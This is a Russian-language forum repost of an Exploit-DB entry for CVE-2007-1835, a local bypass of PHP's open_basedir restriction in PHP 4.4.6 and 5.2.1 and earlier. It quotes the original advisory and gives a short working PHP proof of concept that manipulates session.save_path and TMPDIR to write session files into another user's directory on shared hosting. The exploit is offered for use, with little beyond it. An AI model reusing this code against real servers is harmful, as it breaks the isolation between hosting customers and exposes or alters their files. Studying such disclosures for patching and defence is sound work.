Exploit PHP 5.2.1 - 'Session.Save_Path()' TMPDIR open_basedir Restriction Bypass

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
29801
Проверка EDB
  1. Пройдено
Автор
STEFAN ESSER
Тип уязвимости
LOCAL
Платформа
PHP
CVE
cve-2007-1835
Дата публикации
2007-03-28
PHP 5.2.1 - 'Session.Save_Path()' TMPDIR open_basedir Restriction Bypass
PHP:
source: https://www.securityfocus.com/bid/23183/info

PHP is prone to a 'open_basedir' restriction-bypass vulnerability due to a design error.

Successful exploits could allow an attacker to access sensitive information or to write files in unauthorized locations.

This vulnerability would be an issue in shared-hosting configurations where multiple users can create and execute arbitrary PHP script code; in such cases, the 'safe_mode' and 'open_basedir' restrictions are expected to isolate users from each other.

The following versions are vulnerable:

PHP 4 up to and including 4.4.6
PHP 5 up to and including 5.2.1 

<?php
  ini_set("session.save_path", "/sessions/user2/");
  putenv("TMPDIR=/sessions/user2/");
  ini_set("session.save_path", "");
  @session_start();
?>
 
Источник
www.exploit-db.com

Похожие темы